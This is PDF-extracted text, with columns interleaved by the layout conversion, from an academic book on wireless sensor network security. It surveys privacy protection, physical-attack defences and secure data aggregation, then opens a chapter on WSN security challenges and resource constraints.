Stajano traffic evaluate anonymity techniques
analysis attacks. Deng, Han, and Mishra (2004) for an indoor location-based system based on the
propose a technique based on a random walk active nat.
through the network. This technique also send Producingtotalanonymityisadifficultproblem
packets randomly to nodes different from the parent given the lack of knowledge about the concerning
node in the routing tree. The main goal of this tech- node’s location. Therefore, for the privacy problem,
nique is to make it harder to a potential adversary there is a tradeoff between the required anonymity
to infer the route from a given node to the base level and the need for public information. Three
station and also to prevent against a possible rate approaches have been proposed to address this
monitoring attack, but it would not protect against problem (Gruteser & Grunwald, 2003b; Gruteser et
a time correlation attack. To protect against a time al., 2003; Priyantha, Chakraborty, & Balakrishnan,
correlation attack, they propose a fractal strategy. 2000; Smailagic & Kogan, 2002):
With this technique a node would generate a fake
packet (with certain probability) while one of its • Decentralize sensitive data. The main idea in
neighbors is sending a packet to the base station. this approach is to distribute the sensed loca-
The fake packet would be sent to another neighbor tion data through a spanning tree. By doing
that consequently may send another fake packet, so, no single node will contain the original
thus, deceiving the potential adversary. These fake data.
packets would use the time-to-live (TTL) parameter • Secure the communication channel. By us-
to decide for how long they would be circulating ing secure communication protocols such as
throughout the network. SPINS (Perrig et al., 2002), eavesdropping
and active attacks can be prevented.
defending Against sensor node • Node mobility. Making the nodes move can
be an effective defense mechanism against
Privacy Attacks
privacy attacks, particularly due to the fact
that location information would be changing
To protect against privacy attacks, several propos-
constantly. For instance, the Cricket system
als have been made that reduce the effects of those
(Priyantha et al., 2000) is a system with
attacks, we will discuss some of those proposals
location support for mobile object inside
in this section (Gruteser, Schelle, Jain, Han, &
buildings.
Grunwald, 2003).
Anonymity Mechanisms Policy-Based Approach
The policy-based approach is a topic that is cur-

When very precise location information is being
rently receiving a great deal of attention from the
used it is easy to identify the user and monitor the
research community. Access control decisions
user’s activity, thus, this opens the door for a privacy
andauthenticationarebasedonthespecificati
attack. The anonymity mechanisms depersonalize
provided by the privacy policies. Molnar and
the data before releasing them; these techniques
Wagner (2004) introduce the concept of private
are an alternative approach to policy-based access
authentication in RFID applications, which can
control.
be considered passive nodes. In the automotive

telematics domain, Duri, Gruteser, Liu, Moskowitz, of their unattended operation mode and their ex-
Perez, Singh et al. (2002) propose a policy-based tremely limited resources. Nodes may be equipped
framework to protect data from the sensors, where with tamper-proof physical protection. For instance,
an on-board computer can act as a trusted agent. an alternative to this is tamper-proof packaging
Snekkenes (2001) presents advanced concepts for (Wood & Stankovic, 2002). Related research
policyspecificationoncellphonenetworks. These
work focuses in the design of hardware that make
concepts allow access control based on criteria their memory content inaccessible to adversaries.
such as request time, location, object speed, and Another alternative is to use special software and
identity. Myles, Friday and Davies (2003) describe hardware to detect physical tampering.
an architecture for a centralized server that controls As the hardware costs decrease, integrating
the access of client applications through the use of tamper-proof hardware would be a feasible solu-
validation modules that verify the XML-formatted tion for sensor network applications. However, the
application policies. Hengartner and Steenkiste research community has agreed by consensus that
(2003) point out that access control policies must the trend should be making cheaper sensor nodes
be governed by room or user policies. The room without adding extra functionalities; thus, integrat-
policies specify who is authorized to ingfind outprotection is not a solution that would
physical
about the people currently in the room, while user be commonly accepted in the near future. One
policies state who is permitted to access location possible approach for protecting against physical at-
information about another user. tacks is self-destruction. The main idea behind this
Langheinrich (2005) proposed a framework approach is that whenever a node detects a possible
called PawS (privacy awareness system). This attack it self-destructs. This is particularly feasible
framework is based on privacy policy advertise- on networks where there are redundant nodes and
ments through special packets called privacy bea- when the cost per node is low. Obviously, the key
cons. Those policies are maintained with privacy to this approach is detecting a possible attack. One
proxies, which keep databases that store those possible solution is to statically verify the status of
policies. their neighbors, but in mobile networks this still
is an open problem.
Information flooding Regarding the deployment of security compo-
nents outside the nodes, several proposals have
Ozturk, Zhang, Trappe, and Ott (2004) propose been made (Bulusu & Jha, 2005). Sastry, Shan-
antitrafficanalysismechanismsto-prevent kar, andan exter
Wagner (2003) introduce the concept of
nal adversary from obtaining the location of a data securelocationverificationandproposeasecur
source.Randomdataroutingandphantom traffic
localization scheme called ECHO that assures node
are used to hide real traffic, so that it is difficult In this scheme, the security
location legitimacy.
for an adversary to track the data source through relies over physical sound properties and RF. The
traffic analysis. Ozturk et al. have developed adversary cannot claim to have a shorter distance
comparable methods that rely on oodingfl based
by starting the ultrasound response early because
routing protocols. it will not have the nonce.
Some similar mechanisms can be used to pre- Hu and Evans (2004) use directional antennas
vent an adversary to track the base station through to defend against wormhole attacks. In the work
trafficanalysisGura ( etal.A.)024, keyproblem presented by Wang et al. (2005b) the authors study
with these techniques is that they involve an energy the modeling and defense of sensor networks
cost in order to provide information anonymity. againstsearch-basedphysicalattacks.Theydefine
a physical attack-based model, where an adversary
Protecting from Physical Attacks walks the network using signal detecting equip-
ment to locate active nodes and destroy them. In
Physical attacks, as we pointed out earlier, represent prior work, the authors identified and modeled
an important threat to sensor networks because blind physical attacks (Wang, Gu, Chellappan,

Schosek, & Xuan, 2005a). The defense algorithm aggregation techniques were proposed without
is executed by individual nodes in two phases: in security in mind, and thus, are vulnerable to at-
the first phase, the nodes detect the attacker
tacks. and framework is proposed to
A mathematical
notify other nodes; in the second phase, the nodes formally evaluate security for aggregation. This
receive the notification and change their state
theory allows to the robustness of an ag-
quantifying
safe mode. gregation operation against a malicious attack. By
Seshadri, Perrig, Van Doorn, and Khosla (2004) using the framework, it is argued that the aggrega-
introduce a mechanism called SWATT to verify tion functionalities that can be securely computed
and detect when memory content is altered. This under the presence of k compromised nodes are
mechanism can be use as defense against a physical exactly the functions that are (k, K )-resilient for
attack by modifying code in the nodes. some K that is not too large. This work opened the
door for secure data aggregation in sensor networks.
secure data Aggregation However, the presented level of aggregation model
is fairly simple compared to real sensor network
As sensor networks increase in size, the amount implementations. Extending this technique to mul-
of data that they collectively sense also increases. tilevel aggregation scenarios with heterogeneous
However, due to the computational limitations of devices is an interesting challenge.
each node, a small sensor is only responsible for a
very small portion of the entire data. Due do this, Secure Data Aggregation Techniques
a network search would probably return a large
amount of raw data, most of which would not be As we pointed out earlier, data aggregation has
of the user’s interest. been studied in reasonable depth. The problem
For this reason, raw data preprocessing is rec- with classical data aggregation is that they all
ommended to produce more meaningful results to assume trusted nodes. Of course, in practice this
the user. This is typically done by a series of aggre- may not be the case, and for this reason, secure
gators. An aggregator is responsible for collecting data aggregation techniques are required.
raw data from a subset of nodes and processing Przydatek, Song, and Perrig (2003) describe
that raw data into more usable data. a secure information aggregation (SIA). They
However, aggregation techniques are par- point out that aggregation techniques and sensor
ticularly vulnerable to attacks because a single networks are vulnerable to a variety of attacks
aggregator node is responsible for processing the including denial-of-service attacks. However,
data from multiple nodes. Due to this fact, secure thisworkfocusesonprotectingagainstaspecific
data aggregation techniques are required by sen- type of attack called stealthy attack. The goal of
sor network that consider the possibility of one or SIA is to ensure that if a user accepts the result
more malicious nodes. of an aggregation as correct, then there is a high
probability that the value is close to the true ag-
Overview gregation value. In case that the aggregated value
has been tampered with, the user must reject the
If an aggregator node is compromised, then all forged value with a high probability.
the transmitted data in the network to the base Hu and Evans (2003) propose a secure aggrega-
station may be forged. To detect this, Ye, Luo, Lu, tion techniquethatusestheTESLA : protocolto
and Zhang)052 (define a mechanism based on provide security. In this case, the nodes organize
statistical filters. This uses multiple into a MAC codes
hierarchy tree where intermediate nodes
across the entire route from the aggregator node playtheaggregatorrole.RecallthattheTESLA :
to the base station. Any packet that does not pass achieves asymmetry through delayed disclosure of
verificationwouldbediscarded. symmetric keys. For this, a child cannot verify the
Wagner (2004) analyzes the resiliency of ag- data authenticity immediately because the key used
gregation techniques, and argues that current to generate the MAC code has not been disclosed.

However, this technique does not guarantee that the to appear, more efficient application- - specific se
data being reported by the nodes and the aggregator curity techniques will also emerge.
are correct. To address this problem, the base station But overall, perhaps the biggest challenge of all
is responsible for distributing temporary keys to is proving that the proposed security techniques
thenetworkaswellastheTESLA : keyused for
work well in real-world sensor network applica-
validating the MAC. By using this key, the node tions. Currently, there is a huge gap between
can verify their children’s MAC codes. real-world WSN development and WSN security
We can note that secure data aggregation tech- research. Thus, we consider that integrating the
niques play an important role in adopting WSN proposed security techniques to real-world appli-
technology due to the large amount of raw data cations is a challenge that should be faced in the
and the localized in-network processing required near future, as opposed to proposing new tech-
in these networks. Research efforts in this area niques that most of the time does not go beyond
have been limited, thus, much more investigation lab implementations.
is needed in this particular topic.
rEfErEncEs
conclusIon
Akyildiz, I., Su, W., Sankarasubramaniam, Y., &
Certainly,incorporatingefficient - security mecha
Cayirci, E. (2002). A survey on sensor networks.
nisms to WSN is a huge challenge, mainly because IEEE Communications Magazine, 40(8), 102-
of the differences they have compared to traditional 114.
networks. Their resource constraints, their large
Anderson, R. J., & Kuhn, M. G. (1996, Novem-
scale deployments, along with their operating en-
ber). Tamper resistance: A cautionary note. Paper
vironments, represent great obstacles to achieve
presented at the Second USENIX Workshop on
security.Nevertheless,efficientmechanismshave
Electronic Commerce, Oakland, CA.
been proposed to deal with a great variety of at-
tacks to which WSN presumably are subjected to. Anderson, R. J., & Kuhn, M. G. (1997). Low cost
Thesesecuritytechniquesconfrontspecific attacks
attacks on tamper resistant devices. In B. Chris-
that operate across different layers of the protocol tianson, B. Crispo, T. M. A. Lomas, & M. Roe
stack. Attacks like signal jamming (physical layer), (Eds.), Security Protocols Workshop (LNCS 1361,
induced collisions (MAC sublayer), packet redirec- pp. 125-136). Springer.
tion (routing layer), and many others have been the
addressed through many security mechanisms, Beresford, A., & Stajano, F. (2003). Location
many of which we described in this chapter. privacy in pervasive computing. IEEE Pervasive
However, most of the security techniques rely Computing, 2(1), 46-55.
heavily on a key distribution protocol and assume Bulusu, N., & Jha, S. (2005). Wireless sensor net-
that secret keys have already been placed on the works: a system perspective. Artech House.
distributed nodes. However as we showed in this
chapter, efficient key distribution in Carman, D. W., Kruus, P. S., & Matt, B. J. (2000).
WSN is no
easy task. In fact, most of the research efforts in Constraints and approaches for distributed sensor
WSNsecurityaredirectedtoproposing network security (Tech. Rep. No. 00-010). NAI
efficient
key distribution techniques; in this chapter we Labs, The Security Research Division.
discussed research work in the area of WSN key Chan, H., & Perrig, A. (2005, March). PIKE: Peer
distribution. As of now, we still believe that there intermediaries for key establishment in sensor
is much room for improvement in efficient key Paper presented at IEEE INFOCOM,
networks.
distribution in wireless sensor networks. As more Miami.
efficientkeydistributionkeymechanismscontinue
0
Chan, H., Perrig, A., & Song, D.X. (2003, May). Gruteser, M., & Grunwald, D. (2003a). Anony-
Random key predistribution schemes for sensor mous usage of location-based services through
networks. Paper presented at the IEEE Symposium spatial and temporal cloaking. In Proceedings of
on Security and Privacy, Oakland, CA. the USENIX MobiSys.
Deng, J., Han, R., & Mishra, S. (2002). INSENS: Gruteser, M., Schelle, G., Jain, A., Han, R., &
Intrusion-tolerant routing in wireless sensor net- Grunwald, D. (2003). Privacy-aware location
works (Tech. Rep. No. CU-CS-939-02). University sensor networks. In M. B. Jones (Ed.), USENIX
of Colorado, Department of Computer Science. HotOS (pp. 163-168).
Deng, J., Han, R., & Mishra, S. (2004). Coun- Gura, N., Patel, A., Wander, A., Eberle, H., &
termeasures against traffic analysis Shantz, in wireless
S. C. (2004). Comparing elliptic curve
sensor networks (Tech. Rep. No. CU-CS-987-04). cryptography and RSA on 8-bit CPUs. In M. Joye
University of Colorado, Department of Computer J.& J.- Quisquater(Eds.,) CHES (LNCS 3156, pp.
Science. 119-132). Springer.
Diffie,Hellman,
W.& , M.New
. E.)6 79 1 ( directions Hartung, C., Balasalle, J., & Han, R. (2005). Node
in cryptography. IEEE Transactions on Information compromise in sensor networks: The need for
Theory, 22(6), 644-654. secure systems (Tech. Rep. No. CU-CS-990-05).
University of Colorado, Department of Computer
Douceur, J. R. (2002). The sybil attack. In P. Drus-
Science.
chel, M. F. Kaashoek, & A. I. T. Rowstron (Eds.),
IPTPS (pp. LNCS 2429, pp. 251-260). Springer. Hengartner, U., & Steenkiste, P. (2003). Protecting
access to people location information. In Hutter
Du, W., Deng, J., Han, Y.S., & Varshney, P. K.
(pp. 25-38).
(2003). A pairwise key pre-distribution scheme for
wireless sensor networks. In Jajodia (pp. 42-51). Hill, J., Szewczyk, R., Woo, A., Hollar, S., Culler,
D. E., & Pister, K. S. J. (2000). System architecture
Duri, S., Gruteser, M., Liu, X., Moskowitz, P.,
directions for networked sensors. In Proceedings
Perez, R., Singh, M., et al. (2002). Framework for
of theth9 International Conference on Architec-
security and privacy in automotive telematics. In
tural Support for Programming Languages and
Proceedings of the 2nd International Workshop on
Operating Systems (pp. 93-104).
Mobile Commerce (WMC ’02), New York, (pp.
25-32). ACM Press. Hu, L., & Evans, D. (2003). Secure aggrega-
tion for wireless network. Paper presented at the
Eschenauer, L., & Gligor, V. D. (2002). A key-man-
SAINT Workshops IEEE Computer Society (pp.
agement scheme for distributed sensor networks.
384-394).
In V. Atluri (Ed.), ACM Conference on Computer
and Communications Security (pp. 41-47). Hu, L., & Evans, D. (2004). Using directional anten-
nas to prevent wormhole attacks. Paper presented
Estrin, D., Govindan, R., Heidemann, J. S., & Ku-
at the NDSS. The Internet Society.
mar, S. (1999). Next century challenges: Scalable
coordination in sensor networks. In Proceedings Hu, Y.-C., Perrig, A., & Johnson, D. B. (2002).
of the MOBICOM (pp. 263-270). Wormhole detection in wireless ad hoc networks
(Tech. Rep. No. TR01-384). Rice University, De-
Gaubatz, G., Kaps, J.-P., & Sunar, B. (2004). Public
partment of Computer Science.
key cryptography in sensor networks: Revisited.
In C. Castelluccia, H. Hartenstein, C. Paar, & D. Karlof, C., & Wagner, D. (2003). Secure routing
Westhoff (Eds.), ESAS (LNCS 3313, pp. 2-18). in wireless sensor networks: Attacks and counter-
Springer. measures. Ad Hoc Networks, 1(2-3), 293-315.

Karp, B., & Kung, H. T. (2000). GPSR: Greedy pe- Perrig, A., Szewczyk, R., Tygar, J. D., Wen, V., &
rimeter stateless routing for wireless networks. Pa- Culler, D. E. (2002). SPINS: Security protocols
per presented at the MOBICOM (pp. 243-254). for sensor networks. Wireless Networks, 8(5),
521-534.
Langheinrich, M. (2005). Personal privacy in
ubiquitous computing: Tools and system support. Pietro, R. D., Mancini, L. V., Law, Y. W., Etalle,
Unpublished doctoral dissertation, Swiss Federal S., & Havinga, P. J. M. (2003). LKHW: A directed
Institute of Technology Zurich. diffusion-based secure multicast scheme for wire-
less sensor networks. Paper presented at the ICPP
Law, Y. W., Doumen, J., & Hartel, P. (2004). Sur-
Workshops. IEEE Computer Society.
vey and benchmark of block ciphers for wireless
sensor networks (Tech. Rep. No. TR-CTIT-04-07). Priyantha, N. B., Chakraborty, A., & Balakrishnan,
Mathematics and Computer Science University of H. (2000). The Cricket location support system.
Twente, Faculty of Electrical Engineering, The Paper presented at the MOBICOM (pp. 32-43).
Netherlands.
Przydatek, B., Song, D. X., & Perrig, A. (2003). SIA:
Madden, S., Franklin, M. J., Hellerstein, J. M., & Secure information aggregation in sensor networks.
Hong, W. (2002). TAG: A tiny aggregation service In I. F. Akyildiz, D. Estrin, D. E. Culler, & M. B.
for ad-hoc sensor networks. SIGOPS Oper. Syst. Srivastava (Eds.), SenSys. ACM (pp. 255-265).
Rev.6,3 (SI), 131-146.
Sastry, N., Shankar, U., & Wagner, D. (2003). Se-
Malan, D. J., Welsh, M., & Smith, M. D. (2004). cureverificationoflocation claims.In
Proceedings
A public-key infrastructure for key distribution of the 2003 ACM Workshop on Wireless Security,
in TinyOS based on elliptic curve cryptography. WiSe ’03, New York, (pp 1–10). ACM Press.
Paper presented at the SECON (pp. 71-80).
Schneier, B. (1996) Applied cryptography: Pro-
Molnar, D., & Wagner, D. (2004). Privacy and tocols, algorithms, and source code in C (2nd ed.).
security in library RFID: Issues, practices, and John Wiley.
architectures.InV.Atluri,B.Pfitzmann,&P.D.
Seshadri, A., Perrig, A., Van Doorn, L., & Khosla,
McDaniel (Eds.), ACM Conference on Computer
P. K. (2004). SWATT: Software-based attestation
and Communications Security (pp. 210-219).
for embedded devices. Paper presented at the
Myles, G., Friday, A., & Davies, N. (2003). Pre- IEEE Symposium on Security and Privacy. IEEE
serving privacy in environments with location- Computer Society.
based applications. IEEE Pervasive Computing,
Shrivastava, N., Buragohain, C., Agrawal, D.,
2(1), 56-64.
& Suri, S. (2004). Medians and beyond: New
Ozturk, C., Zhang, Y., Trappe, W., & Ott, M. aggregation techniques for sensor networks. In
(2004). Source-location privacy for networks of Proceedings of the 2nd International Conference
energy-constrained sensors. Paper presented at the on Embedded Networked Sensor Systems, SenSys
WSTFEUS (pp. 68-81). IEEE Computer Society. ’04, New York, (pp. 239-249). ACM Press.
Papadimitratos, P., & Haas, Z. (2002). Secure rout- Smailagic, A., & Kogan, D. (2002). Location
ing for mobile ad hoc networks. In Proceedings privacy in pervasive computing. IEEE Wireless
of SCS Communication Networks and Distributed Communications, 9
(5), 10-17.
System Modeling and Simulation Conference,
Snekkenes, E. (2001). Concepts for personal
CNDS ’04.
location privacy policies. Paper presented at the
Perrig, A., Stankovic, J. A., & Wagner, D. (2004). ACM Conference on Electronic Commerce (pp.
Security in wireless sensor networks. Communica- 48-57).
tions of the ACM, 47(6), 53-57.

Stankovic, J. A., Abdelzaher, T. F., Lu, C., Sha, Zhu, S., Setia, S., & Jajodia, S. (2003). LEAP:
L., & Hou, J. C. (2003). Real-time communication Efficientsecuritymechanismsforlarge- - scaledis
and coordination in embedded sensor networks. tributed sensor networks. In Jajodia (pp. 62-72).
ProceedingsoftheIEEE,(7), 1 9 1002-1022.
Tanachaiwiwat, S., Dave, P., Bhindwale, R., & kEy tErMs
Helmy, A. (2003). Secure locations: Routing on
trust and isolating compromised sensors in loca- Compromised Node: A node on which an at-
tion-aware sensor networks. In Proceedings of tacker has gained control after network deployment.
the 1st International Conference on Embedded Generally compromise occurs once an attacker
Networked Sensor Systems, SenSys ’03, New York, has found a node, and then directly connects the
(pp. 324-325). ACM Press. node to their computer via a wired connection of
some sort. Once connected the attacker controls
Wagner, D. (2004). Resilient aggregation in sensor
the node by extracting the data and/or putting new
networks. In Proceedings of the 2nd ACM Workshop
data or controls on that node.
on Security of Ad Hoc and Sensor Networks, SASN
’04, New York, (pp. 78-87). ACM Press. Data Aggregation: Process of reducing large
amounts of sensor generated data to smaller and
Wang, X., Gu, W., Chellappan, S., Schosek, K., &
more representative data sets that synthesize the
Xuan, D. (2005a). Lifetime optimization of sensor
state of the phenomena that the network is moni-
networks under physical attacks. Paper presented
toring.
at the IEEE International Conference on Commu-
nications, ICC ’05 (Vol. 5, pp. 3295-3301). Data Freshness: Implies that the sensed data
are recent, and it ensures that no adversary replayed
Wang, X., Gu, W., Chellappan, S., Xuan, D., & Lai,
old messages.
T. H. (2005b). Sacrificial node-assisted defense
against search-based physical attacks in sensor Insider Attacks: These types of attacks are
networks (Tech. Rep.). Ohio State University, De- those launched by adversaries that have access
partment of Computer Science and Engineering. to one or more compromised nodes in a network.
Insider attacks are the most challenging ones be-
Wang, X., Gu, W., Schosek, K., Chellappan, S., &
cause the adversary has access to the network’s
Xuan, D. (2005c). Sensor network configuration
cryptographic materials (i.e., keys, ciphers, and
under physical attacks. In X. Lu & W. Zhao (Eds.),
data).
ICCNMC (LNCS 3619, pp. 23-32). Springer.
Key Distribution:Processofefficiently-distrib
Watro, R. J., Kong, D., Fen Cuti, S., Gardiner, C.,
uting cryptographic keys to the nodes that belong
Lynn, C., & Kruus, P. (2004). TinyPK: Securing
to a network. These keys could either be pairwise
sensor networks with public key technology. In
keys (for two party communications), group keys
Setia & Swarup (pp. 59-64).
(for cluster-wide communication), or network keys
Wood, A. D., & Stankovic, J. A. (2002). Denial (for secure broadcast communication).
of service in sensor networks. IEEE Computer,
Mote: A wireless receiver/transmitter that is
5 3 (10), 54-62.
typically combined with a sensor of some type to
Ye, F., Luo, H., Lu, S., & Zhang, L. (2005). Sta- create a remote sensor. Some motes are designed
tistical en-route filtering of injected false data
to be incredibly small in
so that they can be deployed
sensor networks. IEEE Journal on Selected Areas by the hundreds or even thousands for various
in Communications, 23(4), 839-850. applications
Node Authentication: Process of ensuring that
a given node and its data are legit.

Outsider Attacks: Attacks perpetrated by with wireless networks. Therefore, attacks such as
adversaries that do not have access to direct ac- replay messages and eavesdropping fall into this
cess to any of the authorized nodes in the network. classification.However,copingwiththisattackis
However, the adversary may have access to the fairly easy by using traditional security techniques
physical medium, particularly if we are dealing such as encryption and digital signatures.

Chapter XXXV
Security and Privacy in Wireless
Sensor Networks:
Challenges and Solutions
Mohamed Hamdi
University of November 7th at Carthage, Tunisia
Noreddine Boudriga
University of November 7th at Carthage, Tunisia
AbstrAct
The applications of wireless sensor networks (WSNs) are continuously expanding. Recently, consistent
researchanddevelopmentactivitieshavebeenassociatedtothisfield.Securityra
issues that should be discussed when deploying a WSN. This is basically due to the fact that WSNs are,
by nature, mission-critical. Their applications mainly include battlefield control, em
(when a natural disaster occurs), and healthcare. This chapter reviews recent research results in the
fieldofWSNsecurity.
IntroductIon However, the enormous potential of WSNs

can be unlocked only if the corresponding infra-
The applications of wireless sensor networks structures are adequately safeguarded. In fact,
(WSNs), which cover both the civil and military violating one or more security properties would
contexts, are continuously expanding. The ability lead to wrong decisions, and consequently wrong
to develop miniaturized, battery powered motes reactions. Hence, security should rank at the top of
that combine sensing, correlation, fusion, and the issues that should be discussed when design-
wireless communication capabilities makes the ing a WSN. Another motivation is that WSNs are,
WSN technology cost-effective for being used in by nature, mission-critical, meaning that they are
future. In fact, WSNs can be used to gather and developed for sensitive tasks where error-tolerance
analyze information about vehicular movement, is very small. The importance of security in the
humidity, temperature, pressure, as well as many WSN context is exacerbated by certain factors
other parameters. including the following:
Security and Privacy in Wireless Sensor Networks: Challenges and Solutions
• Sensor nodes have limited storage, computa- also be proposed. This taxonomy is based
tion, and power resources. For this reason, on three major attack activities: (1) attacks
security mechanisms should be adapted to on transmitted information, (2) attacks on
the WSN capabilities. architecture, structure, protocols, and (3)
• The network does not have a static infra- attacks on the localization framework.
structure. WSN architectures can be only 4. Countermeasures: Potential security solu-
timelydefined.Thisrenderstheapplication tions that allow countering the aforemen-
of existing robust cryptographic mechanisms tioned threats will be proposed. They will be
(e.g., public key infrastructure [PKI], digital classifiedaccordingtothelevelatwhichthe
signature) more difficult than in customary act (e.g., link level, routing, and application).
networks. Countermeasures will be also categorized
• The sensing and communication tasks are into preventive and reactive solutions. For
often performed in a hostile environment example, robust localization (resp. fault-
where the gathered events are subjected to tolerance)schemesbelongtothefirstresp. (
numerousthreatsthatmightaffectsecond) thefinal category.
decision. 5. Building security policies for WSNs:
• The detected events are forwarded through Several key security processes, such as
the sensor nodes themselves, preventing the monitoring and incident response, can not
application of strong communication security be directly applied in the WSN field. They
mechanisms. should therefore be heavily adapted in order
tosupportWSNspecificconstraints.
This chapter surveys recent research activities
in the area of WSN security. More accurately, the
following aspects will be discussed: wIrElEss sEnsor nEtworks
1. Wireless sensor networks: This section ad- Due to advances in wireless communications and
dresses several WSN basic issues to highlight electronics over the last few years, the development
therelatedscientificchallenges. ofComponents,
networks of low-cost, low-power, multifunc-
architecture, topology, routing, mobile target tional sensors has received increasing attention.
tracking, and alert management will be, These sensors are small in size and able to sense,
among others, discussed. process data, and communicate with each other,
2. WSN security objectives: Traditional secu- typically over an radio frequency (RF) channel.
rity goals i. ( e., confidentiality, authenticity,
A sensor network is designed to detect events or
integrity, and availability) should be extended phenomena, collect and process data, and trans-
tofittherequirementsofWSNs.Several - par information to interested users. Basic
mit sensed
ticular concepts are introduced at this level. features of sensor networks are:
For instance, confidentiality, authenticity,
and integrity, which have been customarily • Self-organizing capabilities
associated to data and node identity, should be • Short-range broadcast communication and
extended to cover node location. This poses multihop routing
several new security challenges in the WSN • Dense deployment and cooperative effort of
context. sensor nodes
3. Attacks against WSNs: This section de- • Frequently changing topology due to fading
scribes the most important attacks techniques and node failures
concerningWSNs.Attacksareclassified - • ac
Limitations in energy, transmit power,
cording to the basic security properties they memory, and computing power
violate. A taxonomy of these attacks will

These characteristics, particularly the last three, of large numbers of inexpensive devices.
make sensor networks different from other wire- However, inexpensive devices can often be
less ad hoc or mesh networks. Clearly, the idea of unreliable and prone to failures. Rates of
mesh networking is not new; it has been suggested device failure will also be high whenever
for some time for wireless Internet access or voice the sensor devices are deployed in harsh or
communication. Similarly, small computers and hostile environments. Protocol designs must
sensors are not innovative per se. However, com- therefore have built-in mechanisms to provide
bining small sensors, low-power computers, and robustness. It is important to ensure that the
radios makes for a new technological platform that global performance of the system is not sen-
has numerous important uses and applications. sitive to individual device failures. Further,
Wireless sensor networks are interesting from it is often desirable that the performance of
an engineering perspective, because they present the system degrade as gracefully as possible
a number of serious challenges that cannot be ad- with respect to component failure.
equately addressed by existing technologies: • Synergy: Moore’s law-type advances in
technology have ensured that device capabili-
• Extended lifetime: As mentioned above, ties in terms of processing power, memory,
WSN nodes will generally be severely energy storage, radio transceiver performance, and
constrained due to the limitations of batteries. even accuracy of sensing improve rapidly
A typical alkaline battery, for example, pro- given
( a fixed cost). However, if economic
vides about 50 watt-hours of energy; this may considerations dictate that the cost per node be
translate to less than a month of continuous reduced drastically from hundreds of dollars
operation for each node in full active mode. to less than a few cents, it is possible that the
Given the expense and potential infeasibil- capabilities of individual nodes will remain
ity of monitoring and replacing batteries for constrained to some extent. The challenge
a large network, much longer lifetimes are is therefore to design synergistic protocols,
desired. In practice, it will be necessary in which ensure that the system as a whole is
many applications to provide guarantees that more capable than the sum of the capabilities
a network of unattended wireless sensors can of its individual components. The protocols
remain operational without any replacements must provide an efficient collaborative use
for several years. of storage, computation, and communication
• Responsiveness: A simple solution to extend- resources.
ing network lifetime is to operate the nodes in • Scalability: For many envisioned applica-
a duty-cycled manner with periodic switching tions, the combination of fine granularity
between sleep and wake-up modes. While sensing and large coverage area implies
synchronization of such sleep schedules is that wireless sensor networks have the po-
challenging in itself, a larger concern is that tential to be extremely large scale (tens of
arbitrarily long sleep periods can reduce the thousands, perhaps even millions of nodes
responsiveness and effectiveness of the sen- in the long term). Protocols will have to be
sors. In applications where it is critical that inherently distributed, involving localized
certain events in the environment be detected communication, and sensor networks must
and reported rapidly, the latency induced by utilize hierarchical architectures in order to
sleep schedules must be kept within strict provide such scalability. However, visions
bounds, even in the presence of network of large numbers of nodes will remain un-
congestion. realized in practice until some fundamental
• Robustness: The vision of wireless sensor problems, such as failure handling and in-situ
networks is to provide large scale, yet fine-
reprogramming, are addressed even in small
grained coverage. This motivates the use settings involving tens to hundreds of nodes.

There are also some fundamental limits on Hence, appropriate security needs and techniques
the throughput and capacity that impact the should be defined for WSN environments while
scalability of network performance. borrowing concepts from the currently used secu-
• Heterogeneity: There will be a heterogeneity rity mechanisms. In the following, we highlight the
of device capabilities (with respect to com- most relevant, from security point of view, WSN
putation, communication, and sensing) in intrinsic features.
realistic settings. This heterogeneity can have
a number of important design consequences. Resource Limitations
For instance, the presence of a small number
of devices of higher computational capability Security mechanisms and processes necessarily
along with a large number of low-capability require a certain amount of processing, power,
devices can dictate a two-tier, cluster-based storage, and memory resources. However, sensor
network architecture, and the presence of nodes are often resource-impoverished. In the
multiple sensing modalities requires pertinent following, we detail the basic resource limitations
sensor fusion techniques. A key challenge is characterizing WSNs.
often to determine the right combination of
heterogeneous device capabilities for a given • Processing limitations: A custom proces-
application. sor for sensor nodes should essentially have
• Self-configuration: Because of their scale a low-power sleep mode, allowing reducing
and the nature of their applications, wireless energy consumption, and a low-overhead
sensor networks are inherently unattended wakeup mechanism, preventing the occur-
distributed systems. Autonomous opera- rence of network congestion due to signalling
tion of the network is therefore a key design messages. Ekanayake (2004) shows that the
challenge. From the very start, nodes in a processing speed offered by most of the avail-
wireless sensor network have to be able to able microcontrollers ranges between 4 and
configuretheirownnetworktopology: - local
400 MIPS. Even though this is a performance
ize, synchronize, and calibrate themselves, to implement the communication functions,
coordinate inter-node communication, and it turns out to be not sufficient to support
determine other important operating param- advanced security mechanisms, especially
eters. when a heavy traffic is exchanged across
• Privacy and security: The large scale, the WSN. For instance, it has been shown by
prevalence, and sensitivity of the information Blaßthat )05 2 ( atraditionalDiffie-Hellman
collected by wireless sensor networks (as key exchange operation would last 48.04
well as their potential deployment in hostile seconds on the AmtelMega processor. As a
locations)giverisetothefinalkeychallenge result, novel security algorithms should be
of ensuring both privacy and security. considered to keep up with the sensor node
processing limitations.
• Limited memory and storage space: A
wsn sEcurIty objEctIvEs sensor is a tiny device with only a small
amount of memory and storage space for the
wsn security challenges code. In order to build an effective security
mechanism, it is necessary to limit the code
WSNs are characterized by many constraints size of the security algorithm. For example,
compared to traditional communication networks. one common sensor type (TelosB) has an
Due to these particular constraints, the application 16-bit, 8 MHz RISC CPU with only 10K
of existing network security approaches does not RAM,K84 programmemory,andK420ash
fl 1
allow to fulfill the required security properties. storage. With such a limitation, the software

built for the sensor must also be quite small. more, the unreliable wireless communication
The total code space of TinyOS, the de-facto channel also results in damaged packets. A
standard operating system for wireless sen- higher channel error rate also forces the soft-
sors, is approximately 4 K (Hill 2000), and ware developer to devote resources to error
the core scheduler occupies only 178 bytes. handling. More importantly, if the protocol
Therefore, the code size for the all security lacks the appropriate error handling it is pos-
related code must also be reduced. sible to lose critical security packets. This
• Power limitation: Energy is the biggest may include, for example, a cryptographic
constraint to wireless sensor capabilities. We key.
assume that once sensor nodes are deployed • Collisions: WSNs impose strict requirements
in a sensor network, they cannot be easily on a medium access protocol. This is basically
replaced (high operating cost) or recharged due to the ad hoc architecture characterizing
(high cost of sensors). Therefore, the battery WSNs as well as the long network lifetime
chargetakenwiththemtothefieldmust needs.be
Moreover, as data are broadcasted over
conserved to extend the life of the individual the radio link, packets may collide resulting
sensor node and the entire sensor network. in decreasing of the channel throughput. De-
When implementing a cryptographic function pending on the medium access and transport
or protocol within a sensor node, the energy layer protocols, the information loss can reach
impact of the added security code must be a certain degree such that the analysis center
